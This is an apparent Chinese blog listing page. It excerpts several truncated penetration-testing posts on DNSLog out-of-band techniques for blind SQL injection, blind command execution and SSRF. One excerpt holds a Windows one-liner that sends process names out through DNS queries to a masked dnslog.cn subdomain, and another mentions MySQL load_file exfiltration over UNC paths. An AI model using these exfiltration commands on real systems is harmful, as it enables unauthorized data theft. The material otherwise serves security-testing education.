一、介绍 首先我们知道DNS是ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP
转载
2021-11-04 14:23:00
1340阅读
2评论
# 如何在Docker中部署DNSLog
## 1. 整体流程
为了在Docker中部署DNSLog,我们需要按照以下步骤进行操作:
| 步骤 | 操作 |
|----|----|
| 1 | 创建Docker镜像 |
| 2 | 运行DNSLog容器 |
| 3 | 测试DNSLog功能 |
## 2. 操作步骤
### 步骤1:创建Docker镜像
首先,我们需要编写一个Docke
原创
2024-07-08 03:30:51
101阅读
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用
原创
2023-12-26 11:10:14
0阅读
之前提到的时间盲注,虽然用途比较广泛,但其查询耗时较长;且盲注都需要发送大量请求,容易被WAF拦截。 此时,我们就要用到DNSlog注入——一个可以以较少的访问次数快速获取信息的注入方式。 (不过,它对服务端有一些额外要求;此处的DNSlog注入必须在相关权限开放且服务端系统为windows时才可执 ...
转载
2021-11-01 12:53:00
998阅读
2评论
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协存在一定的误报率。
原创
2023-12-20 11:03:14
0阅读
一、是什么? DNSLog ⽤于监测 DNS 和 HTTP 访问记录,可通过HTTP请求,让⽬标主机主动请求 DNSLog API 地址,有相应的解析记录,则可判定为存在相应的漏洞。二、应用场景 简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。三、DNS网址 ceye.io 提供DNSlog、HTTP等的查
转载
2021-05-04 21:12:52
1025阅读
2评论
在渗透测试中,SQL盲注、命令盲注等漏洞是较难利用的,由于无回显,这类漏洞即使存在也显得有些鸡肋。针对此类问题,我们可以使用DNSLOG来进行突破。DNSLOG是一种回显机制,使用者可以通过DNS解析日志来读取漏洞的回显。参考文章:使用DNSLOG拯救你的盲打盲注...
原创
2022-04-23 20:10:27
523阅读
0x01 DNSLOG原理我们在测试一些网站的时候,会遇到一些网站注入是无回显的,这个时候一般就直接丢sqlmap,或者我们自己写个脚本来进行盲注,但是尝试次数太多,很有可能被ban掉ip,所以往往盲注的效率真的很低,然后某一天新的技术就产生了,也就是DNSlog注入。 具体原理如下:首先需要有一个可以配置的域名,比如:dnslog.cn,然后通过代理商设置域名 dnslog.cn 的namese
原创
2021-05-24 10:15:41
3648阅读
# DNSLog和ASP.NET
DNSLog是一个用于收集和分析网络流量的工具,它可以帮助安全研究人员、开发者和系统管理员实时监控和分析DNS请求和响应。本文将介绍如何在ASP.NET应用程序中使用DNSLog。
## 什么是DNSLog?
DNSLog是一种用于获取DNS请求和响应的工具。它通过在DNS服务器上设置中间人攻击,截取传入和传出的DNS流量。当DNS服务器收到DNS请求时,它
原创
2023-08-12 06:54:00
56阅读
DNSlog简介
在某些情况下,无法利用漏洞获得回显。但是,如果目标可以发送DNS请求,则可以通过DNS log方式将想获得的数据外带出来。
DNS log常用于以下情况:
SQL盲注
无回显的命令执行
无回显的SSRF
网上公开提供dnslog服务有很多,比如dnslog.cn、知道创宇、三叶草等等,但是这些提供的域名是固定的,现在一些比较大型的企业已经把这些域名也加入到监控范围之中了。
如
原创
2023-07-14 16:22:45
679阅读
1、for循环实现 for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul 2、利用powershell foreach循环实现 powershell -c "Get ...
转载
2021-10-02 17:58:00
514阅读
2评论
申请云服务器时, 自带一个公网ip, 但是这个公网ip没有绑定在本地的网卡中, 安装interactsh会有问题, dnslog无法正常使用, 需
原创
2024-09-19 11:34:04
0阅读
这个探测RCE漏洞的重点不在于 ping 通了什么样的服务器,而是在于验证该服务器是否能直接 ping 通外网,如果使用DNS
原创
2023-12-26 11:10:01
0阅读
但是如果该处没有回显,那么就该利用DNSLog平台来解决无回显的问题了,首先我们打开DNSLog服务平台,点击
原创
2023-12-26 11:09:30
0阅读
目录sqlmap简介基本格式sqlmap详细命令:Options(选项):Target(目标):Request(请求):Enumeration(枚举):Optimization(优化):Injection(注入):Detection(检测):Techniques(技巧):Fingerprint(指纹):Brute force(蛮力):File system access(访问文件系统):Opera
转载
2023-12-18 22:37:35
131阅读
DNSlog注入 原理: 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了,图示如下。 DNS在解析的时候会留
原创
2023-08-03 19:58:34
0阅读
MySQL知识总结四(SQL注入)MySQL知识总结一(MySQL常见术语)MySQL知识总结二(MySQL基本操作)MySQL知识总结三(MySQL查询数据)MySQL知识总结四(SQL注入)MySQL知识总结五(MySQL函数和运算符) 如果通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 SQL注入:是指web应用程序对用户输入数据
转载
2024-03-03 23:05:15
29阅读
dnslog带外实现依赖UNC,因此只能在Windows下利用利用DNS记录不存在时向上查询的工作模式实现带外***不支持load_file('http://host:port/1.txt')模式,否则用不着dns了。OOB带外中心思想将本地数据select...通过触发器load_file(...)将结果传递到外部(含文件)xx.dnslog.cn0x00先说结论0x00.1dns
原创
2020-12-21 09:42:04
1857阅读
DNSLog的平台实际使用很长见的一种情况就是针对漏洞无回显的情况,我们通过让受害者的服务器主动发起对DNSLog服务平台的请求去外带一些信息,但更多的使用场景是我们仅仅使用DNSLog去作为探测漏洞是否存在的一种手段。现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,
原创
2023-12-26 11:10:03
0阅读
现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下
原创
2023-12-26 11:09:33
0阅读
